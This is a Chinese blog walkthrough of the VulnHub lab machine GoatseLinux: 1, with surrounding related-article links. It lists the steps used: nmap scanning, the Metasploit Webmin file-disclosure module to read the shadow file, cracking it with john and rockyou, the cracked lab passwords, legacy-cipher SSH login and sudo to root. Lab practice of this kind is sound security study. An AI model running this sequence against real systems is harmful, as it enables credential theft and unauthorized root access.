靶场练习第二十三天~vulnhub靶场之GOATSELINUX: 1

最新推荐文章于 2024-06-13 09:54:29 发布
最新推荐文章于 2024-06-13 09:54:29 发布
阅读量1.1k 收藏 7
点赞数
分类专栏: # 靶机练习 文章标签: 安全 linux debian
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/123003737
版权

一、准备工作

kali和靶机都选择NAT模式(kali与靶机同网段)

1.靶场环境

下载链接:GoatseLinux: 1 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶机的ip

扫描靶机ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)扫描靶机开放的端口及其服务

nmap -A 192.168.101.129

2.网站的信息收集

(1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息

http://192.168.101.129ea1afc677e91917f8a4e4f149cce52b1.png61278da462501f75528b52359853bbfa.png

http://192.168.101.129/goatse.htmlf05ea3782d04e06cf03ca9a9ece372a2.png

(2)看看靶机的10000端口

http://192.168.101.129:10000/

这个登录网页是基于Web的系统管理工具Webmin,可能从这里寻找突破口

3. msfconsole模块

1)进入到msf

msfconsole

2)查找webmin可以利用的脚本

search webmin

3)使用该脚本

use auxiliary/admin/webmin/file_disclosure

或者用序号代替

use 1

4)查看需要设置的参数

show options

5)设置RHOSTS(靶机)

set RHOSTS 192.168.101.129

6)使用run开启攻击

run

7)将得到的信息放到shadow文件里面

vim shadow

cat shadow

4.john解码

john --wordlist=/usr/share/wordlists/rockyou.txt shadow

得到了4个密码用户

bobby :jpelman

kokomo :jblow

guest:guest

gaping:goatse

三、提权

1.用goatse用户ssh登录,

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc goatse@192.168.101.129

因为登录远程登录到系统版本比较老只能采用以上方法登录

2.sudo提权

sudo -l

gaping

id

sudo su

id

汉南帝
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GoatseLinux: 1靶机
小小猪的博客
06-18 468
GoatseLinux: 1靶机 arp-scan -l 扫描靶机IP地址
渗透测试攻防练习实验室 (资源分享,国外在线教程)
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
Metasploit辅助模块
aod83029的博客
10-21 709
msf>showauxiliary Auxiliary ========= NameDisclosureDateRankDescription ----...
Kali Linux 网络扫描秘籍 第六章 拒绝服务(二)
热门推荐
龙哥盟
11-24 4万+
第六章 拒绝服务(二) 作者:Justin Hutchens 译者:飞龙 协议:CC BY-NC-SA 4.0 6.6 NTP 放大 DoS 攻击NTP 放大 DoS 攻击利用响应远程 monlist 请求的网络时间协议(NTP)服务器。 monlist 函数返回与服务器交互的所有设备的列表,在某些情况下最多达 600 个列表。 攻击者可以伪造来自目标 IP 地址的请求,并且
metasploit - auxiliary
Nixawk
04-20 5942
msf >use auxiliarys/ use auxiliary/admin/android/google_play_store_uxss_xframe_rce use auxiliary/admin/appletv/appletv_display_image use auxiliary/admin/appletv/appletv_display_video use auxiliary/admi
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到...
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
vulhub靶场Webmin(CVE-2019-15107)漏洞复现
weixin_45095113的博客
12-12 749
Webmin(CVE-2019-15107)漏洞复现
linux之kali基础及vulhub靶场搭建
qq_51670115的博客
08-26 1042
kali的安装与介绍简介,配置kali系统源,ssh服务,用户组,用户信息,用户组信息,权限管理,软件安装管理,查找命令,vulhub搭建靶场
墨者学院-Webmin未经身份验证的远程代码执行
qq_47094508的博客
07-01 579
首先拿到靶场后进行访问,访问后来到一个登陆页面根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行 直接查询根下的key.txt即可......
antisamy XML 简介
周碧银
09-29 1886
1) antisamy-slashdot.xml Slashdot (http://www.slashdot.org/)是一个提供技术新闻的网站,它允许用户用有限 的 HTML 格式的内容匿名回帖。Slashdot 不仅仅是目前同类中最酷的网站之一,而 且同时也曾是最容易被成功攻击的网站之一。更不幸的是,导致大部分用户遭受攻 击的原由是臭名昭着的 goatse.cx 图片(请你不要
CVE-2019-15107 Webmin远程命令执行漏洞复现 (文末EXP)
Vitaminapple的博客
06-03 1012
CVE-2019-15107 Webmin远程命令执行漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y inst
墨者靶场(初级) Webmin未经身份验证的远程代码执行
曹振国的博客
06-24 299
命令执行的漏洞在old参数后 1. 漏洞原理 https://www.anquanke.com/post/id/184668 2. 漏洞复现 https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md 3. 漏洞利用 (1)修改提交地址 POST /session_login.cgi HTTP/1.1 ===> POST /password_change.cgi HTTP/1.
SonarQube安全扫描常见问题
帅小缙的大脑风暴❤
06-11 527
SonarQube质量配置之扫描常见问题与问题修复
振弦采集仪在隧道工程中的安全监测与控制研究
最新发布
duxi222333的博客
06-13 501
通过安装振弦传感器,可以实时监测地下水位的变化情况,并采取相应的措施来保证隧道的安全。通过安装振弦传感器,可以实时监测地层的变形情况,并采取相应的措施来保证隧道的安全。同时,振弦采集仪也可以用于隧道施工期间的地层补偿控制,以减少地层的变形对施工的影响。总结,隧道工程的安全监测与控制是非常重要的工作,而振弦采集仪作为一种高精度和灵敏度的仪器,可以有效地监测和控制隧道工程中的地层变形、地下水位变化和地震影响等情况。振弦采集仪具有高精度和灵敏度的特点,能够对隧道工程中发生的微小变形进行准确的监测和控制。
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 981
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
vulnhub靶场 planets
08-28
- *3* [靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值